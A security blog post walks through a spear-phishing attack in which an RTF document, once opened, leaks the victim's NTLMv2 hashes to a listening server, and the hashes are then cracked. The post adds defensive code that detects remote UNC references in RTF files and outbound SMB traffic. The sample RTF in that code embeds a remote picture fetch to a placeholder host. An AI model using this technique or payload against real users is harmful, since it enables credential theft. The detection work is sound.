Word Heist!

So, I stumbled upon an interesting script.

Over the years, I have been using various tools and scripts to do spear phishing, with the many vulnerabilities in the Microsoft Office suite and Adobe PDF Reader being enablers, and the ability to embed macros being an even bigger enabler. But things have changed: users are now keen on the "enable macros" warning and they don't enable macros anymore 😦

(Screenshot: macros warning)

…hence most spear phishing attempts fail, or are filtered by mail filters, firewalls and IPSs because they are deemed suspicious.

So this was a breath of fresh air, and it seems to get through most IPSs and security devices.

On your listening server:

Download the script. Put an image of your choice in the folder; I chose elephant.jpg.

Start the script as below. Here we want this server to act as the listening server, hence the 1 after the image name; setting it to 0 will not run the listener.

(Screenshot: script start)

The script is mostly automated, and the only hard work is sending the file. Notice below that an *.rtf file (1491333207.rtf) has been generated from the *.jpg image (elephant.jpg).

(Screenshot: file created)

This is what we need to send to our victim, and this is where we need to get really creative.

After sending the *.rtf document to victim:

Wait for the victim to open the document, and immediately you notice NTLM hashes being populated on the listening server terminal. At the same time a file, passwords_netntlmv2, containing the NTLMv2 hashes is created. Which brings us to the last step: cracking the hashes.
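From the defender's side, the interesting property of the document above is that merely opening it makes Word reach out over SMB to the listening server. The post does not show the inside of the generated .rtf, so the checker below is an added example, not the script's output or code: it assumes the document references the image by a UNC path (or a file:// URL with a host), which is the simplest explanation for the port 445 connection and the NetNTLMv2 hashes shown. The sample RTF fragments, the INCLUDEPICTURE field and the 203.0.113.5 address are all constructed for the example; the internal address ranges are an assumption you would adjust for your own network.

```python
"""Static check for RTF attachments that pull a picture/resource from a remote host.

Added example: scans RTF source for UNC paths (plain \\host\share or the
RTF-escaped \\\\host\\share form) and file:// URLs with a host part, and
flags any that point outside the ranges we consider internal.
"""
import ipaddress
import re

# Assumption: these ranges are "internal"; anything else is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# UNC reference: 2 backslashes (plain) or 4 (RTF-escaped), then host, then
# 1-2 backslashes and the rest of the path. The lookbehind stops matches
# starting in the middle of a run or after "C:" style drive letters.
UNC_RE = re.compile(
    r'(?<![\\\w:])(?:\\){2,4}([A-Za-z0-9][A-Za-z0-9.\-]*)(?:\\){1,2}([^\s"}]+)')
# file:// URL carrying a host component (file:///C:/... has none).
FILE_URL_RE = re.compile(
    r'file:/{2,5}([A-Za-z0-9][A-Za-z0-9.\-]*)/([^\s"}]*)', re.I)


def is_external_host(host):
    """IP literals are checked against INTERNAL_NETS; DNS names with a dot
    are treated as external, bare NetBIOS-style names as internal."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." in host
    return not any(ip in net for net in INTERNAL_NETS)


def find_remote_refs(rtf_text):
    """Return every remote reference found, with the host classified."""
    refs = []
    for rx, kind in ((UNC_RE, "unc"), (FILE_URL_RE, "file-url")):
        for m in rx.finditer(rtf_text):
            host = m.group(1)
            refs.append({"kind": kind, "host": host, "path": m.group(2),
                         "external": is_external_host(host)})
    return refs


def scan_rtf(rtf_text):
    """Summary a mail filter could act on: any remote ref at all, and whether
    one of them leaves the internal ranges."""
    refs = find_remote_refs(rtf_text)
    return {"remote_refs": refs,
            "any_remote_ref": bool(refs),
            "suspicious": any(r["external"] for r in refs)}


# Constructed sample: a field that fetches a picture from an external UNC path.
SAMPLE_RTF = r"""{\rtf1\ansi\deff0
{\field{\*\fldinst{ INCLUDEPICTURE "\\\\203.0.113.5\\pics\\elephant.jpg" \\d }}{\fldrslt{}}}
\par Quarterly figures attached.
}"""

# Constructed benign sample: an embedded picture and a local path in the text.
BENIGN_RTF = r"""{\rtf1\ansi\deff0
\par Saved from C:\\Users\\me\\report.rtf
{\pict\jpegblip 00ff}
}"""

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

In a mail-filtering context you would normally treat any UNC reference in an inbound document as worth quarantining, not only the external ones; the `any_remote_ref` flag is there for that stricter policy.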

(Screenshot: password hashes)

Password cracking

There are many tools to do this, but John the Ripper is recommended for various reasons. I used JtR for this illustration, as below:

(Screenshot: username and password)

And voilà, the victim's password!

Note: this would certainly have taken longer depending on the complexity of the password and the wordlist used.

From a blue teamer's point of view:

  • We see the need for strong passwords that meet password complexity requirements.
  • An outbound connection on port 445 is common, especially for Meterpreter sessions, and would point (though not conclusively) to an indicator of compromise.
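The second bullet is the one that is easy to hunt for. The detection below is an added example, not part of the original post: it reads firewall-style connection records and flags TCP/445 connections from internal hosts to external addresses, then groups them per source/destination pair so that one workstation opening one document shows up as a single finding. The log line format, the addresses and the timestamps are constructed for the example, and the internal ranges are an assumption to adjust for your own network.

```python
"""Flag outbound SMB (TCP/445) from internal hosts to external addresses.

Added example over a constructed log format; not tied to any vendor's syntax:
  <timestamp> <action> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>
"""
import ipaddress
import re

# Assumption: RFC 1918 ranges are "internal"; everything else is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<action>\w+)\s+(?P<proto>\w+)\s+'
    r'(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$')

# Constructed sample log: one legitimate internal file-share session, two
# allowed outbound SMB connections from one workstation, one HTTPS session
# and one outbound SMB attempt that the firewall blocked.
SAMPLE_LOG = """\
2017-04-04T09:12:01Z ALLOW TCP 192.168.10.23:51234 -> 192.168.10.5:445
2017-04-04T09:12:03Z ALLOW TCP 192.168.10.23:51240 -> 203.0.113.5:445
2017-04-04T09:12:03Z ALLOW TCP 192.168.10.23:51241 -> 203.0.113.5:445
2017-04-04T09:12:07Z ALLOW TCP 192.168.10.40:49311 -> 198.51.100.7:443
2017-04-04T09:12:09Z BLOCK TCP 192.168.10.61:52001 -> 198.51.100.20:445
"""


def is_internal(ip_str):
    ip = ipaddress.ip_address(ip_str)
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line):
    """One record as a dict with integer ports, or None if the line is not in
    the expected format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def find_outbound_smb(log_text, ports=(445,)):
    """Records where an internal source talks to an external host on an SMB port.
    Blocked attempts are kept too: the client still tried to authenticate."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP" or rec["dport"] not in ports:
            continue
        if is_internal(rec["src"]) and not is_internal(rec["dst"]):
            events.append(rec)
    return events


def summarize(events):
    """Group by (src, dst): count, how many were allowed, first timestamp."""
    by_pair = {}
    for e in events:
        entry = by_pair.setdefault((e["src"], e["dst"]),
                                   {"count": 0, "allowed": 0, "first_seen": e["ts"]})
        entry["count"] += 1
        if e["action"] == "ALLOW":
            entry["allowed"] += 1
    return by_pair


if __name__ == "__main__":
    for (src, dst), info in summarize(find_outbound_smb(SAMPLE_LOG)).items():
        print(f"{src} -> {dst}:445  {info}")
```

An allowed pair is the urgent case (credentials have already left the network); a blocked pair still tells you which workstation opened a document that tried to talk SMB to the internet and is worth a look at that user's mailbox.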
